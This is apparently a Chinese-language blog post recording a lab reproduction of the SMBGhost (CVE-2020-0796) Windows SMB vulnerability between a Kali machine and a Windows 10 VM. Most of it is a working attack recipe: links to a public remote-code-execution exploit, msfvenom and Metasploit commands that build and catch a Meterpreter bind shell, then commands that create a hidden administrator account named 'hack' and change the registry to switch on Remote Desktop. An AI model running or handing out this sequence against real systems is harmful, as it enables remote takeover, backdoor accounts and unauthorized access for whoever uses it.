今天整理资料时发现了之前存的一个cve漏洞复现过程，当时打算跟着复现来着，后来也没去复现，今天刚好有时间，所以来复现一下这个漏洞

漏洞讲解

https://www.freebuf.com/vuls/233263.html
https://blog.csdn.net/RatOnSea/article/details/106399450
https://www.cnblogs.com/A66666/p/29635a243378b49ccb485c7a280df989.html

漏洞复现

镜像：ed2k://|file|cn_windows_10_business_editions_version_1903_x64_dvd_e001dd2c.iso|4815527936|47D4C57E638DF8BF74C59261E2CE702D|
Scanner：
1.https://github.com/ollypwn/SMBGhost
2.http://dl.qianxin.com/skylar6/CVE-2020-0796-Scanner.zip
POC：https://github.com/chompie1337/SMBGhost_RCE_PoC.git

Windows10:192.168.0.129

kali:192.168.0.130

python3 scanner.py 192.168.0.129

msfvenom -p windows/x64/meterpreter/bind_tcp lport=6666 -f py -o tool.py

msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
show options
set LPORT 6666
set RHOST 192.168.0.129
exploit

python3 exploit1.py -ip 192.168.0.129

提权

net user hack hack /add


net localgroup Administrators hack /add
net localgroup Users hack /del


net user hack

发现无法连接，使用如下命令开启远程连接功能

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

等待30秒后即可成功连接